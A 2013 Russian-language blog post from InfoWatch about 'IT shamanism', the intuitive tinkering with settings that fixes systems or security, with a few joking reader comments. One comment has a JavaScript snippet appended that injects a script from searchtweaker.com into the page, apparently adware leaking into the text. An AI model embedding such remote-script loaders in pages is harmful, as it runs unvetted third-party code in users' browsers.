23 Июля, 2013

Пляска с бубном

InfoWatch
Вам приходилось шаманить? Наверняка ведь бывало такое, что настроил капризную программу или железку, а как именно это сделал – сам не понимаешь? «Потыкал наугад уже не помню, что – и заработало!» Или помню, что потыкал, но не могу понять, почему.
       

И ведь что интересно: если непрофессионал будет тыкать наугад, у него никогда ничего не настроится. А у айтишника "угад" – особый. Это его интуиция, то есть неосознанный опыт прошлых жизнейнастроек. Даже если он не знает точно, в чём проблема и как данная настройка может на эту проблему влиять, он чувствует, что может.

Ваш покорный слуга неоднократно добивался ИТ-шаманством того, чего не смог добиться чтением документации и гуглением текста сообщения об ошибке. Поэтому сейчас я сперва шаманю, потом гуглю, а уж в самом крайнем случае – читаю мануал. Вовсе не от бескультурья, а в соответствии с эмпирическими данными о вероятности успеха того или иного действия.

С безопасностью это тоже помогает. Когда риск не идентифицирован, человек с опытом может его отразить интуитивно. Покрутив кое-какие настройки, поставив и удалив кое-какой софт, он достигает более крепкой безопасности. Хотя и не может вербально объяснить, как это было сделано.

Безопасник с бубном отличается от сисадмина с бубном тем, что у последнего результат становится виден сразу после завершения камлания. А безопасность – штука вероятностная...

или введите имя

CAPTCHA
amateur
24 Июля, 2013
Что лучше "горячее " сражение или ИТ "война"?
Читал в одной американской книжке -"Лучше перестраховаться , чем потом таблетки "вёдрами" кушать.." Ваше мнение , ИТ профессионал? "Брещут буржуины?" (function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
0 |
Ad-Min
24 Июля, 2013
Безопасник с бубном отличается от сисадмина с бубном тем, что у последнего результат становится виден сразу после завершения камлания. А безопасность – штука вероятностная... Вот поэтому лучше безопастник без бубна. Бубен - это прерогатива админа.
0 |
SysAdmin
24 Июля, 2013
Бубен молодому сисадмину не выдают. Он у него отрастает как признак наступления половой зрелости.
0 |